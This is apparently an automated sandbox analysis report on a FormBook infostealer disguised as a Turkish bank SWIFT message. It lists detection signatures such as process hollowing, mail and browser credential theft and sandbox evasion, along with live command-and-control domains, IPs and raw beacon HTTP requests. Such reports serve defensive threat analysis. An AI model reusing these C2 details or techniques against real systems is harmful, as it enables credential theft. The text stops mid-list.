Windows Analysis Report
Ziraat Bankasi Swift Mesaji20221129-34221.exe

Overview

General Information

Sample Name: Ziraat Bankasi Swift Mesaji20221129-34221.exe
Analysis ID: 755920
MD5: 6a0ff43510923c27b144bf86b5e0a867
SHA1: 880c264f12ea2175a81f7030dec9c7043093253f
SHA256: 52426e75e25f69d9d7a8121464fe16a213ab48519ae10b2e2fc028ce86794a8b
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

barindex
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Virustotal: Detection: 44% Perma Link
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe ReversingLabs: Detection: 39%
Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: http://www.oaksinstitute.net/qmpa/?mRh4lr=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&VrWd=-Z5PLbzhUhYhR8K Avira URL Cloud: Label: malware
Source: http://www.multimediapages.com/qmpa/?mRh4lr=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61ftArfg9GGH4Fupqg==&VrWd=-Z5PLbzhUhYhR8K Avira URL Cloud: Label: malware
Source: http://www.oaksinstitute.net/qmpa/ Avira URL Cloud: Label: malware
Source: http://www.multimediapages.com/qmpa/ Avira URL Cloud: Label: malware
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.erwgcb.top/qmpa/"]}
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.451564221.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.323677233.00000000010BA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.450849283.0000000000CEA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.453208658.0000000004434000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.562757134.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.563719254.00000000046EF000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.451564221.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.323677233.00000000010BA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.450849283.0000000000CEA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.453208658.0000000004434000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.562757134.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.563719254.00000000046EF000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: bqbz.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe

Networking

barindex
Source: C:\Windows\explorer.exe Domain query: www.notarpucarhr.com
Source: C:\Windows\explorer.exe Domain query: www.oaksinstitute.net
Source: C:\Windows\explorer.exe Network Connect: 103.11.189.189 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.multimediapages.com
Source: C:\Windows\explorer.exe Network Connect: 141.136.43.229 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 38.239.92.131 80 Jump to behavior
Source: Malware configuration extractor URLs: www.erwgcb.top/qmpa/
Source: Joe Sandbox View ASN Name: VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG
Source: Joe Sandbox View ASN Name: SENDER-ASLT SENDER-ASLT
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73ehw8miGBWwdljwfXw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.notarpucarhr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61ftArfg9GGH4Fupqg==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.multimediapages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.oaksinstitute.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 103.11.189.189 103.11.189.189
Source: global traffic HTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.multimediapages.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.multimediapages.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.multimediapages.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 52 68 34 6c 72 3d 6d 63 4c 7a 7a 6c 6c 51 57 77 75 6a 4d 66 4c 6f 52 70 77 35 65 38 31 69 78 38 6d 58 62 51 5a 4c 73 6e 4b 42 38 44 67 6b 55 49 61 68 7a 49 4e 62 6e 6d 30 59 79 36 4e 37 54 33 76 33 72 6d 6a 76 4f 51 46 68 31 6d 33 6f 76 73 4f 62 52 57 69 70 78 6d 37 42 4a 65 6d 4c 79 44 61 4f 34 47 6a 5a 70 43 75 66 75 35 76 6e 6c 6f 37 78 30 70 79 2d 46 48 63 41 49 30 37 47 71 70 72 4a 54 36 4c 38 55 5f 45 6e 51 5f 28 48 66 38 64 59 50 71 62 30 78 31 7e 62 55 79 6f 4b 33 4e 37 6e 65 30 72 50 59 77 58 4c 45 4f 6b 50 39 51 71 56 47 51 6c 44 6f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: mRh4lr=mcLzzllQWwujMfLoRpw5e81ix8mXbQZLsnKB8DgkUIahzINbnm0Yy6N7T3v3rmjvOQFh1m3ovsObRWipxm7BJemLyDaO4GjZpCufu5vnlo7x0py-FHcAI07GqprJT6L8U_EnQ_(Hf8dYPqb0x1~bUyoK3N7ne0rPYwXLEOkP9QqVGQlDow).
Source: global traffic HTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.oaksinstitute.netConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.oaksinstitute.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.oaksinstitute.net/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 52 68 34 6c 72 3d 30 61 48 4d 32 53 52 43 32 57 74 51 34 71 63 70 31 61 68 6c 38 43 63 78 6f 4f 6a 79 36 71 30 6a 28 53 62 46 31 42 42 5a 37 53 32 58 54 6c 79 6e 37 48 64 32 67 63 61 5a 4f 6f 7e 34 36 44 61 42 57 6c 52 4d 54 49 42 67 36 41 41 75 45 43 4b 33 5a 37 36 6e 62 45 53 67 34 30 67 31 35 7a 74 4b 74 6e 7a 76 4e 6f 42 6c 4f 45 53 30 6d 46 45 5a 56 59 47 65 6d 57 70 67 4c 65 42 6a 65 2d 62 39 76 71 50 59 42 50 7e 34 38 4a 48 50 49 6b 69 73 6c 63 62 4f 74 44 6d 64 62 6f 73 59 6a 61 55 64 70 58 71 63 33 32 77 72 35 74 69 53 7a 77 41 50 6b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: mRh4lr=0aHM2SRC2WtQ4qcp1ahl8CcxoOjy6q0j(SbF1BBZ7S2XTlyn7Hd2gcaZOo~46DaBWlRMTIBg6AAuECK3Z76nbESg40g15ztKtnzvNoBlOES0mFEZVYGemWpgLeBje-b9vqPYBP~48JHPIkislcbOtDmdbosYjaUdpXqc32wr5tiSzwAPkw).
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 29 Nov 2022 09:18:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 33 63 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 54 5b 6f 1a 47 14 7e f7 af 98 ee 93 fd 00 03 8e 23 b9 74 d9 0a 1b 24 23 d9 8d 9b 90 56 7e 24 5c cc b6 c0 a2 65 12 5a 45 91 c0 89 0b 98 8b 89 8d 9d d8 59 9a d8 b2 1b d7 4e 16 47 69 31 e1 52 ff 97 64 67 76 79 f2 5f e8 59 96 52 b9 aa f2 b0 b3 3b 73 ce 9c ef 9c ef 3b 67 f9 2f bc b7 e6 03 2b cb 3e b4 10 58 5a 44 cb 77 e7 16 fd f3 88 b3 61 fc fd 8d 79 8c bd 01 af 65 98 b1 3b 9c 18 fb be e1 10 17 23 24 e5 c2 38 93 c9 d8 33 37 ec 92 bc 8a 03 b7 71 8c 24 e2 33 38 4d 64 31 44 ec 61 12 e6 84 09 de 8c 28 f0 0b 3e 8f 57 e0 03 fe c0 a2 4f 60 6b 27 4c 39 35 0e cf 58 b5 c0 1a 8f d9 cb 63 5d 29 19 cd e3 c1 c1 9f 3c b6 5c 26 f8 25 5f c0 03 a0 81 65 9b ef db bb fe ef dc dc bc 94 24 91 24 b1 05 7e 4e 45 38 34 da b9 39 12 f9 89 0c 71 bf 42 a1 58 50 4e 47 88 fb 3e 89 da 66 4d e8 3b 81 95 45 1f 22 70 61 e4 17 4a a7 e1 1c a1 b9 5b de 15 f4 10 45 21 a4 0b 7d 99 22 d8 39 9d 22 88 aa 25 ad bf 8d 1e 81 c3 82 73 6c 36 4d d8 79 f3 3f f6 e9 cf 5e f7 b8 e2 62 f2 47 70 09 49 71 49 76 21 39 12 1e 86 f5 b8 1e 88 69 91 c0 6e 6c 4a 04 65 49 4a 82 95 c7 c3 74 21 6d 6c 91 65 26 09 94 79 e6 a0 86 8c 18 26 31 f7 4d 87 03 dd 93 e4 70 44 76 3b 50 28 12 8f a7 53 c1 90 98 5c 75 3b 1d e0 78 1b 1e 2f 5c 8f 39 3f cf 30 d8 27 40 02 ad 5d a1 eb 17 f4 28 af f5 2f f5 fa 09 2b 66 d9 66 4d fb eb 85 be ff 84 e6 df b2 8a 3a d6 45 7f a1 d2 fe 0e 2b ec 82 40 60 05 c9 06 7b b5 4f d9 35 80 92 01 2f 25 18 cd 0b 7a de 30 9a 3b 5a f7 58 6b 97 d8 76 45 eb 2b 57 bd 7d 1e a7 c0 7e 3f 0e 4b 5c 14 e8 6f 6b ec 57 05 90 0d f5 48 6b 77 8c fc 29 bd 78 47 3b 75 50 de 78 dc a7 47 2f ff 17 70 d0 38 bc ea 95 01 41 6b 57 f5 fe 53 fd 6c 4f 57 0f f4 da 2f f4 e9 73 23 57 d7 df 77 21 11 1e 43 78 0b a3 b2 43 f3 5d 3e 88 62 72 24 ea e6 7e 08 3e 08 a6 43 b2 98 22 ae b8 14 0a 12 51 4a da e5 48 5c 0a 86 27 a7 38 81 16 2e d8 ee 39 8f 83 02 2b 17 07 5b 2a e0 d0 0f 2d 8b 0e ba de d2 ba bb 16 11 83 7c 05 6a fb 17 07 0f 2b 8a 4d 0b 66 7b a2 41 7d cf 68 36 d1 8c c3 69 77 22 1b 82 ce d6 bb 9b 56 67 03 05 86 7a 39 78 a6 ea f5 77 5a a7 3a a2 f5 d9 2b b6 53 30 bb bf b4 a5 77 1b 66 d8 7b b2 e0 87 e6 96 93 11 82 b4 cb 03 96 6b 32 a5 42 37 0e d0 a4 df 7f 67 8a c7 00 35 e6 9a 6d 64 99 d2 b4 bc ae 7a 05 20 d2 3a 61 f5 26 2b e7 b4 4e 07 88 b1 84 bc ea 15 af 0b 60 f4 df d0 c2 39 1a b3 33 1a e1 55 c9 9e 10 43 b2 94 96 a2 c4 1e 92 12 38 9a 31 bb 17 7f 6d ae 62 d8 3d eb 9c 75 70 c2 d2 3f 2e 48 eb bc a6 db 39 0b cf ca d3 a4 10 98 63 35 45 ff e3 90 96 d7 59 e9 cd c7 ac 62 b2 f3 31 db a0 5b 65 d8 00 3d f0 6d 76 cf ab fc e0 f0 f9 35 d1 58 71 9b f6 b2 e0 04 d5 22 da 56 e9 c6 ef e0 0b c5 d1 cd 26 55 4e 90 79 3c 12 7d ef 04 4d 8a 40 53 62 55 9e 42 5a fb ad 45 2f 54 0a da e9 4f 5a b4 56 b5 92 b0 50 80 1c 88 6a 74 ce b4 6e 7f 70 0a 4d 94 83 b8 9f b2 b0 2a d6 45 56 7d 4d 0b ad 71 92 74 fd 3d c8 64
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 29 Nov 2022 09:18:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 35 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1 b5 3c 2f 54 49 54 4c 45 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0a 3c 2f 53 54 59 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0a 3c 68 31 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1 b5 3c 2f 68 31 3e 0a e6 82 a8 e4 b8 8d e5 85 b7 e5 a4 87 e4 bd bf e7 94 a8 e6 89 80 e6 8f 90 e4 be 9b e7 9a 84 e5 87 ad e6 8d ae e6 9f a5 e7 9c 8b e8 af a5 e7 9b ae e5 bd 95 e6 88 96 e9 a1 b5 e7 9a 84 e6 9d 83 e9 99 90 e3 80 82 0a 3c 68 72 3e 0a 3c 70 3e e8 af b7 e5 b0 9d e8 af 95 e4 bb a5 e4 b8 8b e6 93 8d e4 bd 9c ef bc 9a 3c 2f 70 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e e5 a6 82 e6 9e 9c e6 82 a8 e8 ae a4 e4 b8 ba e8 87 aa e5 b7 b1 e5 ba 94 e8 af a5 e8 83 bd e5 a4 9f e6 9f a5 e7 9c 8b e8 af a5 e7 9b ae e5 bd 95 e6 88 96 e9 a1 b5 e9 9d a2 ef bc 8c e8 af b7 e4 b8 8e e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 81 94 e7 b3 bb e3 80 82 3c 2f 6c 69 3e 0a 3c 6c 69 3e e5 8d 95 e5 87 bb 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 22 3e e5 88 b7 e6 96 b0 3c 2f 61 3e e6 8c 89 e9 92 ae ef bc 8c e5 b9 b6 e4 bd bf e7 94 a8 e5 85 b6 e4 bb 96 e5 87 ad e6 8d ae e9 87 8d e8 af 95 e3 80 82 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 68 32 3e 48 54 54 50 20 e9 94 99 e8 af af 20 34 30 31 2e 31 20 2d 20 e6 9c aa e7 bb 8f e6 8e 88 e6 9d 83 ef bc 9a e8 ae bf e9 97 ae e7 94 b1 e4 ba 8e e5 87 ad e6 8d ae e6 97 a0 e6 95 88 e8 a2 ab e6 8b 92 e7 bb 9d e3 80 82 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 e4 bf a1 e6 81 af e6 9c 8d e5 8a a1 20 28 49 49 53 29 3c 2f 68 32 3e
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299768442.000000000601A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299949266.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301530080.0000000006038000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301709757.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300558881.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300033238.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301117508.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300849965.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301599425.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301307567.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300634815.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301060629.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300119023.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301530080.0000000006038000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301709757.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300558881.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301117508.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300849965.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301599425.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301307567.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300634815.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301060629.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300950320.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301645997.0000000006031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com69
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299938247.000000000601A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com8I
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299938247.000000000601A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comFH
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299949266.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299985983.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comGr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comand
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 